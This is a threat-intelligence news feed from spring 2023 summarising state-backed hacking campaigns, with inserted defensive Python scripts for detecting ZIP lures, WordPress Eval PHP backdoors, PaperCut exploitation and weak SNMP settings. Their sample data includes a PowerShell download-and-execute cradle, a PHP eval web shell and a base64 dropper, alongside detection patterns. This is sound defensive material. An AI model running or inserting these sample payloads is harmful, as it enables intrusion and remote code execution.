North Korean hacking group Kimsuky is distributing a new version of its reconnaissance malware called ReconShark. The cyberespionage campaign involves sending emails containing a link to a password-protected doc hosted on Microsoft OneDrive. The malware can steal sensitive data from the infected sy... (Cyware)
May 6, 2023
Russian actor Uses WinRAR and DD Command to Destroy Ukrainian Data Full Text
Abstract
CERT-UA confirmed the discovery of a malicious script dubbed RoarBat that is most probably being used by the Russian threat group Sandworm to wipe data from Ukrainian state networks. The script uses the WinRAR application to archive and compress files and then delete specific fil... (Cyware)
May 6, 2023
Meta Cracks Down on South Asian Cyberespionage Groups Full Text
Abstract
Social media giant Meta took down hundreds of fake Facebook and Instagram accounts used by South Asian advanced persistent threat groups to glean sensitive information and coax users into installing malware. (Cyware)
May 05, 2023
Hackers Targeting Italian Corporate Banking Clients with New Web-Inject Toolkit DrIBAN Full Text
Abstract
Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019. "The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments trying to alter legitimate banking transfers performed by the victims by changing the beneficiary and transferring money to an illegitimate bank account," Cleafy researchers Federico Valentini and Alessandro Strino said. The bank accounts, per the Italian cybersecurity firm, are either controlled by the threat actors themselves or their affiliates, who are then tasked with laundering the stolen funds. The use of web injects is a time-tested tactic that makes it possible for malware to inject custom scripts on the client side by means of a man-in-the-browser (MitB) attack and intercept traffic to and from the server. The fraudulent transactions are often realized by means of a technique call... (The Hacker News)
May 05, 2023
N. Korean Kimsuky Hackers Using New Recon Tool ReconShark in Latest Cyberattacks Full Text
Abstract
The North Korean state-sponsored threat actor known as Kimsuky has been discovered using a new reconnaissance tool called ReconShark as part of an ongoing global campaign. "[ReconShark] is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said. Kimsuky is also known by the names APT43, ARCHIPELAGO, Black Banshee, Nickel Kimball, Emerald Sleet (previously Thallium), and Velvet Chollima. Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe. The latest intrusion set documented by SentinelOne leverages geopolitical themes related to North Korea's nuclear proliferat... (The Hacker News)
May 04, 2023
Kimsuky hackers use new recon tool to find security gaps Full Text
Abstract
The North Korean Kimsuky hacking group has been observed employing a new version of its reconnaissance malware, now called 'ReconShark,' in a cyberespionage campaign with a global reach. (BleepingComputer)
May 4, 2023
Iranian Surveillance Operations Use BouldSpy to Track Minority Groups Full Text
Abstract
The law enforcement command of the Islamic Republic of Iran (FARAJA) is allegedly physically deploying a malware strain known as BouldSpy on the devices of a section of people. As per reports, it has been in use since at least 2020 and has claimed more than 300 victims to date. The malware serves the pur... (Cyware)
May 03, 2023
Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics Full Text
Abstract
A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi, which is a subgroup within APT41 (aka HOODOO or Winnti) and shares overlaps with various other clusters known as Earth Baku, SparklingGoblin, and GroupCC. Earth Longzhi was first documented by the cybersecurity firm in November 2022, detailing its attacks against various organizations located in East and Southeast Asia as well as Ukraine. Attack chains mounted by the threat actor leverage vulnerable public-facing applications as entry points to deploy the BEHINDER web shell, and then leverage that access to drop additional payloads, including a new variant of a Cobalt Strike loader called CroxLoader. "This recent campa... (The Hacker News)
May 3, 2023
Hackers are taking advantage of the interest in generative AI to install Malware Full Text
Abstract
Threat actors are using the promise of generative AI like ChatGPT to deliver malware, Facebook parent Meta warned. Threat actors are taking advantage of the huge interest in generative AI like ChatGPT to trick victims into installing malware, Meta... (Security Affairs)
May 02, 2023
North Korea’s ScarCruft Deploys RokRAT Malware via LNK File Infection Chains Full Text
Abstract
The North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default. "RokRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate multi-stage infection chains," Check Point said in a new technical report. "This is another representation of a major trend in the threat landscape, where APTs and cybercriminals alike attempt to overcome the blocking of macros from untrusted sources." ScarCruft, also known by the names APT37, InkySquid, Nickel Foxcroft, Reaper, RedEyes, and Ricochet Chollima, is a threat group that almost exclusively targets South Korean individuals and entities as part of spear-phishing attacks designed to deliver an array of custom tools. The adversarial collective, unlike the La... (The Hacker News)
May 01, 2023
Vietnamese Threat Actor Infects 500,000 Devices Using ‘Malverposting’ Tactics Full Text
Abstract
A Vietnamese threat actor has been identified as being behind a "malverposting" campaign on social media platforms to infect over 500,000 devices worldwide over the past three months to deliver variants of information stealers such as S1deload Stealer and SYS01stealer. Malverposting refers to the use of promoted social media posts on services like Facebook and Twitter to mass propagate malicious software and other security threats. The idea is to reach a broader audience by paying for ads to "amplify" their posts. According to Guardio Labs, such attacks commence with the adversary creating new business profiles and hijacking already popular accounts to serve ads that claim to offer free adult-rated photo album downloads. Within these ZIP archive files are purported images that are actually executable files, which, when clicked, activate the infection chain and ultimately deploy the stealer malware to siphon session cookies, account data, and other information. (The Hacker News)
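The lure described above relies on the victim not noticing that the "photos" inside the ZIP are executables. The scanner below is an added example for this page, not Guardio Labs' tooling: it opens an archive and judges each entry by its extension chain (a double extension such as .jpg.exe), by whitespace padding that pushes the real extension out of view in a file dialog, and by the magic bytes of the content, so a PE renamed to .png is caught even when the name alone looks clean. The archive is constructed in memory; the extension lists and the eight-byte signature check are the example's own assumptions.

```python
"""Flag disguised executables inside a lure ZIP. Added example; archive is constructed."""
import io
import zipfile

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".webp"}
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".lnk", ".msi", ".hta"}
# Leading-byte signatures (assumption: the first 8 bytes are enough to classify these formats).
MAGIC = [(b"MZ", "pe"), (b"\x4c\x00\x00\x00\x01\x14\x02\x00", "lnk"),
         (b"\xff\xd8\xff", "jpeg"), (b"\x89PNG", "png"), (b"GIF8", "gif")]
PADDED_NAME = "album/IMG_0004.jpg" + " " * 17 + ".scr"   # padding hides ".scr" in narrow file dialogs


def sniff(head):
    """Identify content by its leading bytes."""
    for sig, kind in MAGIC:
        if head.startswith(sig):
            return kind
    return "unknown"


def judge_entry(name, head):
    """Return the reasons an archive entry looks like a disguised executable (empty if clean)."""
    base = name.rsplit("/", 1)[-1].rstrip()
    parts = base.lower().split(".")
    exts = ["." + p.strip() for p in parts[1:]]
    kind = sniff(head)
    reasons = []
    if exts and exts[-1] in EXEC_EXTS:
        reasons.append(f"executable extension {exts[-1]}")
    if len(exts) >= 2 and exts[-2] in IMAGE_EXTS:
        reasons.append("image extension before the final extension")
    if any("    " in p for p in parts[1:-1]):
        reasons.append("whitespace padding before the final extension")
    if kind in ("pe", "lnk") and (not exts or exts[-1] not in EXEC_EXTS):
        reasons.append(f"{kind} content but extension {exts[-1] if exts else '(none)'}")
    return reasons


def scan_zip(blob):
    """Return [(entry name, reasons)] for every suspicious entry in the archive bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)       # only the header is needed; never execute the content
            reasons = judge_entry(info.filename, head)
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip():
    """Constructed lure archive: one real-looking image, a text file, three disguised payloads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("album/IMG_0001.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)     # genuine JPEG header
        zf.writestr("album/IMG_0002.jpg.exe", b"MZ\x90\x00" + b"\x00" * 60)       # PE, double extension
        zf.writestr("album/IMG_0003.png", b"MZ\x90\x00" + b"\x00" * 60)           # PE renamed to .png
        zf.writestr(PADDED_NAME, b"MZ\x90\x00" + b"\x00" * 60)                    # PE, padded name
        zf.writestr("album/readme.txt", b"enjoy the photos")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip(build_sample_zip()):
        print(f"{name!r}: {'; '.join(reasons)}")
```

Reading only the first eight bytes keeps the check cheap on large archives and means the content is never executed or fully decompressed; the magic-byte rule is the one that survives renaming, while the name rules catch the cases where the payload is an unusual format.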
April 30, 2023
White hat hackers showed how to take over a European Space Agency satellite Full Text
Abstract
Thales cybersecurity researchers have shown this week how they seized control of a European Space Agency (ESA) satellite. This week, during the third edition of CYSAT, the European event dedicated to cybersecurity for the space industry, the European... (Security Affairs)
April 26, 2023
Chinese Hackers Spotted Using Linux Variant of PingPull in Targeted Cyberattacks Full Text
Abstract
The Chinese nation-state group dubbed Alloy Taurus is using a Linux variant of a backdoor called PingPull as well as a new undocumented tool codenamed Sword2033. That's according to findings from Palo Alto Networks Unit 42, which discovered recent malicious cyber activity carried out by the group targeting South Africa and Nepal. Alloy Taurus is the constellation-themed moniker assigned to a threat actor that's known for its attacks targeting telecom companies since at least 2012. It's also tracked by Microsoft as Granite Typhoon (previously Gallium). Last month, the adversary was linked to a campaign called Tainted Love targeting telecommunication providers in the Middle East as part of a broader operation referred to as Soft Cell. Recent cyber espionage attacks mounted by Alloy Taurus have also broadened their victimology footprint to include financial institutions and government entities. PingPull, first documented by Unit 42 in June 2022, is a remote... (The Hacker News)
April 26, 2023
Chinese Hackers Using MgBot Malware to Target International NGOs in Mainland China Full Text
Abstract
The advanced persistent threat (APT) group referred to as Evasive Panda has been observed targeting an international non-governmental organization (NGO) in Mainland China with malware delivered via update channels of legitimate applications like Tencent QQ. The attack chains are designed to distribute a Windows installer for MgBot malware, ESET security researcher Facundo Muñoz said in a new report published today. The activity commenced in November 2020 and continued throughout 2021. Evasive Panda, also known as Bronze Highland and Daggerfly, is a Chinese-speaking APT group that has been attributed to a series of cyber espionage attacks targeting various entities in China, Hong Kong, and other countries located in East and South Asia since at least late December 2012. The group's hallmark is the use of the custom MgBot modular malware framework, which is capable of receiving additional components on the fly to expand on its intelligence-gathering capabilities. Some of th... (The Hacker News)
April 26, 2023
FIN7 Hackers Caught Exploiting Recent Veeam Backup & Replication Vulnerability Full Text
Abstract
At the end of March 2023, WithSecure caught FIN7 attacks that exploited internet-facing servers running Veeam Backup & Replication software to execute payloads on the compromised environment. (Cyware)
April 24, 2023
Russian Hackers Tomiris Targeting Central Asia for Intelligence Gathering Full Text
Abstract
The Russian-speaking threat actor behind a backdoor known as Tomiris is primarily focused on gathering intelligence in Central Asia, fresh findings from Kaspersky reveal. "Tomiris's endgame consistently appears to be the regular theft of internal documents," security researchers Pierre Delcher and Ivan Kwiatkowski said in an analysis published today. "The threat actor targets government and diplomatic entities in the CIS." The Russian cybersecurity firm's latest assessment is based on three new attack campaigns mounted by the hacking crew between 2021 and 2023. Tomiris first came to light in September 2021 when Kaspersky highlighted its potential connections to Nobelium (aka APT29, Cozy Bear, or Midnight Blizzard), the Russian nation-state group behind the SolarWinds supply chain attack. Similarities have also been unearthed between the backdoor and another malware strain dubbed Kazuar, which is attributed to the Turla group (aka Krypton, Secre... (The Hacker News)
April 24, 2023
Hackers Exploit Outdated WordPress Plugin to Backdoor Thousands of WordPress Sites Full Text
Abstract
Threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign, Sucuri revealed in a report published last week. The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code into pages and posts of WordPress sites, which is then executed every time the posts are opened in a web browser. While Eval PHP has not received an update in 11 years, statistics gathered by WordPress show that it's installed on over 8,000 websites, with the number of downloads skyrocketing from one or two on average since September 2022 to 6,988 on March 30, 2023. On April 23, 2023, alone, it was downloaded 2,140 times. The plugin has racked up 23,110 downloads over the past seven days. GoDaddy-owned Sucuri said it observed malicious code injected into the "wp_posts" table of some infected websites' databases, the table that stores a site's posts,... (The Hacker News)
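Because the backdoor lives in the database rather than on disk, file-integrity scanning of the web root misses it; the place to look is wp_posts itself. The hunt below is an added example for this page, not Sucuri's tooling: a cheap SQL pre-filter pulls candidate rows, and Python then classifies what each row contains (a PHP open tag, code-execution and decoder functions, file writes, reads of request parameters). It assumes the plugin wraps code in an [evalphp]...[/evalphp] shortcode and that the table uses the default wp_ prefix; the rows, including the base64 blob, are constructed sample data held in an in-memory SQLite table standing in for MySQL.

```python
"""Hunt wp_posts for PHP planted via the Eval PHP plugin. Added example; rows are constructed."""
import re
import sqlite3

# Cheap SQL pre-filter: LIKE is case-insensitive for ASCII in both MySQL and SQLite.
HUNT_SQL = """
SELECT ID, post_title, post_type, post_status, post_content
FROM wp_posts
WHERE post_content LIKE '%[evalphp]%'
   OR post_content LIKE '%<?php%'
   OR post_content LIKE '%base64_decode%'
"""

# Finer classification of what the pre-filter returned (labels are the example's own).
INDICATORS = [
    (re.compile(r"\[evalphp\].*?\[/evalphp\]", re.S | re.I), "evalphp shortcode"),  # assumed shortcode name
    (re.compile(r"<\?php", re.I), "raw php tag"),
    (re.compile(r"\b(eval|assert|system|passthru|shell_exec)\s*\(", re.I), "code-exec function"),
    (re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I), "obfuscation decoder"),
    (re.compile(r"\bfile_put_contents\s*\(", re.I), "file write"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b", re.I), "reads request input"),
]


def hunt(conn):
    """Return one dict per post whose content carries PHP indicators, in ID order."""
    findings = []
    for pid, title, ptype, status, content in conn.execute(HUNT_SQL):
        hits = [label for rx, label in INDICATORS if rx.search(content)]
        if hits:
            findings.append({"ID": pid, "title": title, "type": ptype,
                             "status": status, "indicators": hits})
    return findings


def build_sample_db():
    """In-memory stand-in for the MySQL wp_posts table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, "
                 "post_content TEXT, post_status TEXT, post_type TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?,?,?)", [
        (1, "Welcome", "<p>Hello world</p>", "publish", "post"),
        # dropper: decodes a blob and writes it to disk every time the page renders
        (2, "Pricing", "[evalphp]<?php file_put_contents('wp-content/uploads/x.php', "
                       "base64_decode('PD9waHAgZWNobyAxOw=='));?>[/evalphp]", "draft", "page"),
        # benign: an HTML-escaped code sample, which the LIKE filter never matches
        (3, "Tutorial", "<pre>Use &lt;?php echo 1; ?&gt; in templates</pre>", "publish", "post"),
        # web shell: evaluates attacker-supplied input
        (4, "Contact", "[evalphp]<?php if(isset($_REQUEST['c'])) eval($_REQUEST['c']); ?>[/evalphp]",
         "private", "post"),
    ])
    return conn


if __name__ == "__main__":
    for f in hunt(build_sample_db()):
        print(f"post {f['ID']} ({f['type']}, {f['status']}) '{f['title']}': {', '.join(f['indicators'])}")
```

The post status is reported on purpose: a draft or private post never appears on the public site, yet the plugin still executes its content when the post is rendered in the admin or via a direct request, so a hunt restricted to published posts would miss exactly the rows an attacker prefers.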
April 24, 2023
Hackers can hack organizations using data found on their discarded enterprise network equipment Full Text
Abstract
ESET researchers explained that enterprise network equipment that was discarded, but not destroyed, could reveal corporate secrets. ESET researchers purchased a few used routers to set up a test environment and made a shocking discovery: in many cases,... (Security Affairs)
April 24, 2023
Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers Full Text
Abstract
Print management software provider PaperCut said that it has "evidence to suggest that unpatched servers are being exploited in the wild," citing two vulnerability reports from cybersecurity company Trend Micro. "PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC," it further added. The update comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical improper access control flaw (CVE-2023-27350, CVSS score: 9.8) in PaperCut MF and NG to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from PaperCut software to install remote management and maintenance (RMM) software like Atera an... (The Hacker News)
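The indicator Huntress describes is a process relationship: the PaperCut server has no reason to launch PowerShell, and when it does the command line usually carries an encoded script that fetches an RMM installer. The triage routine below is an added example for this page, not Huntress tooling. It filters ProcessCreate events for that parent-child pair, decodes a -EncodedCommand argument (base64 of UTF-16LE) so the analyst sees the real script, and tags download cradles and RMM product names. The PaperCut process name pc-app.exe, the RMM keywords other than Atera (which the page names), the cradle patterns and the events themselves are assumptions constructed for the example; the URL host is a reserved example domain.

```python
"""Triage PaperCut -> PowerShell events and decode -EncodedCommand. Added example; events constructed."""
import base64
import ntpath
import re

PAPERCUT_PARENTS = ("pc-app.exe",)   # assumption: PaperCut MF/NG application server binary
RMM_KEYWORDS = ("atera", "syncro", "anydesk", "splashtop", "screenconnect")  # Atera from the page, rest assumed
CRADLE = re.compile(r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|bitsadmin|\bcurl\b)", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternative first.
ENCODED = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if the command line has none."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(ev):
    """Return a finding dict for a PaperCut -> PowerShell ProcessCreate event, else None."""
    parent = ntpath.basename(ev["parent_image"]).lower()
    child = ntpath.basename(ev["image"]).lower()
    if parent not in PAPERCUT_PARENTS or child not in ("powershell.exe", "pwsh.exe"):
        return None
    reasons = ["powershell spawned by PaperCut server"]   # suspicious on its own
    script = decode_encoded_command(ev["command_line"])
    if script is not None:
        reasons.append("encoded command")
    else:
        script = ev["command_line"]
    if CRADLE.search(script):
        reasons.append("download cradle")
    rmm = [k for k in RMM_KEYWORDS if k in script.lower()]
    if rmm:
        reasons.append("rmm installer: " + ", ".join(rmm))
    return {"pid": ev["pid"], "script": script, "reasons": reasons}


def triage_all(events):
    return [f for f in (triage(ev) for ev in events) if f]


def _encode(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 7001, "parent_image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://files.example.invalid/AteraAgent.ps1')")},
    {"pid": 7002, "parent_image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c \"Get-Date | Out-File C:\\temp\\ts.txt\""},
    {"pid": 7003, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c \"iwr http://files.example.invalid/a.msi -OutFile a.msi\""},
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {'; '.join(f['reasons'])}\n    {f['script']}")
```

The second sample event is reported even though its script is harmless: the parent-child pair is the exploitation signal, and the decoded content only adds context. Decoding is what makes the RMM name visible; matched against the raw base64 string, the Atera keyword would never fire.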
April 24, 2023
North Korean Hackers Target Mac Users With New ‘RustBucket’ Malware Full Text
Abstract
Dubbed RustBucket and able to fetch additional payloads from its command-and-control (C&C) server, the malware has been attributed to the APT actor BlueNoroff, which is believed to be a subgroup of the infamous Lazarus hacking group. (Cyware)
April 24, 2023
Threat actors can use ChatGPT to sharpen cyberthreats, but no need to panic yet Full Text
Abstract
Since the generative artificial intelligence chatbot was released in November, Palo Alto Networks’ Unit 42 has detected up to 118 malicious URLs related to ChatGPT daily and domain squatting related to the tool has surged 17,818%. (Cyware)
April 24, 2023
Hackers Exploit Generative AI to Spread RedLine Stealer MaaS Full Text
Abstract
As generative AI tools like OpenAI ChatGPT and Google Bard continue to dominate the headlines—and pundits debate whether the technology has taken off too quickly without necessary guardrails—cybercriminals are showing no hesitance in exploiting them. (Cyware)
April 20, 2023
Hackers Storing Malware in Google Drive as Encrypted ZIP Files To Evade Detection Full Text
Abstract
Google’s Cybersecurity Action Team (GCAT) and Mandiant researched a list of techniques and methods that threat actors have used over the period to penetrate environments and carry out other malicious activities. (Cyware)
April 19, 2023
Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies Full Text
Abstract
The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe leveraged a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon. "Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week. "It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways." Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities. It has also repeatedly leveraged trojanized versions of Kavac... (The Hacker News)
April 19, 2023
U.S. and U.K. Warn of Russian Hackers Exploiting Cisco Router Flaws for Espionage Full Text
Abstract
U.K. and U.S. cybersecurity and intelligence agencies have warned of Russian nation-state actors exploiting now-patched flaws in networking equipment from Cisco to conduct reconnaissance and deploy malware against targets. The intrusions, per the authorities, took place in 2021 and targeted a small number of entities in Europe, U.S. government institutions, and about 250 Ukrainian victims. The activity has been attributed to a threat actor tracked as APT28, which is also known as Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, and Sofacy, and is affiliated with the Russian General Staff Main Intelligence Directorate (GRU). "APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742," the National Cyber Security Centre (NCSC) said. CVE-2017-6742 (CVSS score: 8.8) is part of a set of remote code execution flaws that stem from a buffer overflow condition in the Simple Network Ma... (The Hacker News)
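Both entry routes the NCSC names start with SNMP: a guessable community string gives the attacker the access that the SNMP buffer overflow then turns into code execution. The audit below is an added example for this page, not from the NCSC advisory or Cisco: it reads a Cisco IOS configuration and flags default or short community strings, read-write communities, communities with no source access-list, and SNMPv3 groups configured without privacy, and it reports whether v1/v2c communities are still present at all. The configuration excerpt, the list of default strings, the 12-character threshold and the severity labels are the example's own assumptions.

```python
"""Audit Cisco IOS SNMP configuration for weak community strings. Added example; config is constructed."""
import re

# Strings an attacker tries first (assumption: the example's own list).
DEFAULT_COMMUNITIES = {"public", "private", "cisco", "admin", "secret", "snmp", "community"}
# snmp-server community <string> [view <name>] [RO|RW] [access-list]
COMMUNITY_RX = re.compile(r"^snmp-server community (\S+)(?:\s+view\s+\S+)?\s*(RO|RW)?(?:\s+(\S+))?\s*$", re.I)
V3_GROUP_RX = re.compile(r"^snmp-server group (\S+) v3 (noauth|auth|priv)\b", re.I)


def audit_snmp(config_text):
    """Return (severity, message) findings for the SNMP lines of an IOS running-config."""
    findings = []
    community_count = 0
    v3_priv = False
    for raw in config_text.splitlines():
        line = raw.strip()
        m = COMMUNITY_RX.match(line)
        if m:
            community_count += 1
            comm, mode, acl = m.group(1), (m.group(2) or "RO").upper(), m.group(3)  # IOS defaults to RO
            if comm.lower() in DEFAULT_COMMUNITIES:
                findings.append(("high", f"default/guessable community '{comm}'"))
            elif len(comm) < 12:
                findings.append(("medium", f"short community '{comm}' (under 12 chars)"))
            if mode == "RW":
                findings.append(("high", f"read-write community '{comm}' lets a caller change the running config"))
            if not acl:
                findings.append(("medium", f"community '{comm}' has no access-list limiting source addresses"))
            continue
        m = V3_GROUP_RX.match(line)
        if m:
            if m.group(2).lower() == "priv":
                v3_priv = True
            else:
                findings.append(("medium", f"SNMPv3 group '{m.group(1)}' uses {m.group(2)}; use priv"))
    if community_count:
        findings.append(("medium", f"{community_count} SNMPv1/v2c community string(s) configured; "
                                   "migrate pollers to SNMPv3 and remove them"))
    if not v3_priv:
        findings.append(("medium", "no SNMPv3 group with priv configured"))
    return findings


# Constructed excerpt of a running-config, not a real device.
SAMPLE_CONFIG = """\
! constructed excerpt
hostname edge-rtr-01
snmp-server community public RO
snmp-server community private RW
snmp-server community Xk9#mQ2vLp7rTz RW 10
snmp-server group NETMON v3 priv access 10
snmp-server group LEGACY v3 auth
access-list 10 permit 10.10.5.0 0.0.0.255
"""

if __name__ == "__main__":
    for sev, msg in audit_snmp(SAMPLE_CONFIG):
        print(f"[{sev.upper()}] {msg}")
```

The strong community in the sample is still flagged because it is read-write: with SNMP write access an attacker does not need a guessable string to alter the device, so the mode and the access-list matter as much as the string's entropy. A configuration that carries only SNMPv3 priv groups and users produces no findings.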
April 19, 2023
Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems Full Text
Abstract
An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 and mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align with Iran's national priorities," the Microsoft Threat Intelligence team said in an analysis. Targeted entities consist of seaports, energy companies, transit systems, and a major U.S. utility and gas company. The activity is suspected to be retaliatory and in response to attacks targeting Iran's maritime, railway, and gas station payment systems that took place between May 2020 and late 2021. It's worth noting here that Iran subsequently accused Israel and the U.S. of masterminding the attacks on the gas stations in a bid to create unrest in the nation. Mint Sandsto... (The Hacker News)
April 18, 2023
Iranian Hackers Using SimpleHelp Remote Support Software for Persistent Access
Abstract
The Iranian threat actor known as MuddyWater is continuing its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems. While the nation-state group has previously employed ScreenConnect, RemoteUtilities, and Syncro, a new analysis from Group-IB has revealed the adversary's use of the SimpleHelp remote support software in June 2022. MuddyWater, active since at least 2017, is assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Some of the top targets include Turkey, Pakistan, the U.A.E., Iraq, Israel, Saudi Arabia, Jordan, the U.S., Azerbaijan, and Afghanistan. "MuddyWater uses SimpleHelp, a legitimate remote device control and management tool, to ensure persistence on victim devices," Nikita Rostovtsev, senior threat analyst at Group-IB, said. "SimpleHelp is not compromised and is used as intended. The threat actors found a way to download the tool from the of ... (The Hacker News)
April 17, 2023
China-linked APT41 group spotted using open-source red teaming tool GC2
Abstract
China-linked APT41 group used the open-source red teaming tool GC2 in an attack against a Taiwanese media organization. Google Threat Analysis Group (TAG) team reported that the China-linked APT41 group used the open-source red teaming tool Google ... (Security Affairs)
April 15, 2023
Transparent Tribe Eyes Indian Education Sector
Abstract
SentinelLabs identified a campaign by the Transparent Tribe that targets the Indian education sector via education-themed malicious Office documents propagating Crimson RAT. The group has long been targeting different sectors in India. Hence, vigilance and robust cyber defense strategies are n ... (Cyware)
April 13, 2023
Pakistan-based Transparent Tribe Hackers Targeting Indian Educational Institutions
Abstract
The Transparent Tribe threat actor has been linked to a set of weaponized Microsoft Office documents in intrusions directed against the Indian education sector to deploy a continuously maintained piece of malware called Crimson RAT. While the suspected Pakistan-based threat group is known to target military and government entities in the country, the activities have since expanded to include the education vertical. The hacking group, also called APT36, Operation C-Major, PROJECTM, and Mythic Leopard, has been active as far back as 2013. Educational institutions have been at the receiving end of the adversary's attacks since late 2021. "Crimson RAT is a consistent staple in the group's malware arsenal the adversary uses in its campaigns," SentinelOne researcher Aleksandar Milenkoski said in a report shared with The Hacker News. The .NET malware has the functionality to exfiltrate files and system data to an actor-controlled server. It's also bui ... (The Hacker News)
April 13, 2023
Lazarus Hacker Group Evolves Tactics, Tools, and Targets in DeathNote Campaign
Abstract
The North Korean threat actor known as the Lazarus Group has been observed shifting its focus and rapidly evolving its tools and tactics as part of a long-running campaign called DeathNote. While the nation-state adversary is known for persistently singling out the cryptocurrency sector, recent attacks have also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world, in what's perceived as a "significant" pivot. "At this point, the actor switched all the decoy documents to job descriptions related to defense contractors and diplomatic services," Kaspersky researcher Seongsu Park said in an analysis published Wednesday. The deviation in targeting, along with the use of updated infection vectors, is said to have occurred in April 2020. It's worth noting that the DeathNote cluster is also tracked under the monikers Operation Dream Job or NukeSped. Google-owned Mandiant has also tied a subset of the activit ... (The Hacker News)
April 10, 2023
Inside the sting operation to catch North Korean crypto hackers
Abstract
In late January, the hackers moved a fraction of their loot to a crypto account pegged to the dollar, temporarily relinquishing control of it. The investigators pounced, flagging the transaction to U.S. law enforcement officials to freeze the money. (Cyware)
April 8, 2023
Google: North Korea-Linked Hackers Target Subject Experts and Think Tanks
Abstract
Google’s TAG identified a new campaign by the North Korean ARCHIPELAGO threat cluster (aka APT43) targeting U.S. and South Korean governments, think tanks, military personnel, academics, policymakers, and researchers. Most notably, ARCHIPELAGO used fraudulent Google Chrome extensions in combination ... (Cyware)
April 05, 2023
Hackers Using Self-Extracting Archives Exploit for Stealthy Backdoor Attacks
Abstract
